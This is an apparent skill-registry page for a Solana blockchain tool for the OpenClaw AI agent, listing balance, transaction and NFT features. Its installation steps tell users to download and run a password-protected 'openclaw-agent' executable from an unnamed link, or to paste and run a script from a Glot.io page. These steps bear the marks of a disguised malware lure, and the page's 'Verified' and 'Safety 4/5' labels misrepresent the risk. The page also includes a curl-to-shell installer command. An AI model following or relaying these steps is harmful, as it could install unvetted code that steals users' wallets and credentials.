ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-vwgfq
Or

What This Skill Does

The Solana skill empowers users to interact with the Solana blockchain directly through the OpenClaw AI agent. It facilitates a range of operations, including checking SOL and SPL token balances for specified addresses, viewing detailed account information, and retrieving transaction histories. The skill also supports monitoring NFTs by providing tools to decode NFT metadata using Metaboss. Additionally, it allows users to inspect stake accounts and offers methods for interacting with Solana's network using both the Solana CLI and curl for direct RPC calls. This skill is designed for users who need to manage or query Solana wallet data, track assets, and explore blockchain activity without needing to leave their AI agent interface.

Installation

To utilize the Solana skill, you must first ensure the openclaw-agent utility is installed and running. Installation instructions vary by operating system:

Windows: Download the openclaw-agent executable from the provided link, extract it (password: openclaw), and run it.

macOS: Visit the provided Glot.io link, copy the installation script, and execute it in your Terminal.

After the openclaw-agent is operational, proceed to install the Solana CLI tools by running:

sh -c "$(curl -sSfL https://release.solana.com/stable/install)"

Finally, configure the Solana CLI to use the mainnet RPC endpoint:

solana config set --url https://api.mainnet-beta.solana.com

Use Cases

  • Wallet Management: Quickly check SOL and token balances for any given Solana address.
  • Transaction Monitoring: View recent transaction history for an address or confirm specific transaction details using a signature.
  • NFT Exploration: Retrieve metadata for NFTs by providing their mint address.
  • Account Auditing: Get a comprehensive overview of an account's details on the Solana blockchain.
  • Staking Information: Check the status and details of stake accounts associated with an address.
  • Network Interaction: Easily switch between different Solana network RPC endpoints (mainnet, devnet, custom).

Example Prompts

  • "What is the SOL balance for the address FQJvj33nnhrGqW64hXjK3u44gL6aP3Sj7z8hQj9yR8mB?"
  • "Show me the recent transaction history for EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v with a limit of 5."
  • "Get the NFT metadata for the mint address HY7x5f2B4gP7xW8v3gC9fD5hA2k1j9p7r8s6t0u1v2."

Tips & Limitations

  • openclaw-agent is crucial: All Solana operations depend on this utility. Ensure it's running before attempting any commands.
  • RPC Endpoints: You can configure the Solana CLI to connect to different RPC endpoints, including devnet for testing and custom providers.
  • Metaboss Installation: For NFT metadata operations, you'll need to install Metaboss using cargo install metaboss.
  • curl for Advanced Users: The skill provides curl examples for directly querying the Solana RPC API, offering more granular control for advanced users.
  • Error Handling: While the skill aims to be robust, complex blockchain operations can sometimes fail due to network issues or invalid inputs. Always double-check addresses and signatures.
  • Rate Limits: Be mindful of potential rate limits imposed by public RPC endpoints when making frequent requests.

Metadata

Stars2387
Views20
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-vwgfq": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#nft#web3
Safety Score: 4/5

Flags: network-access, external-api, code-execution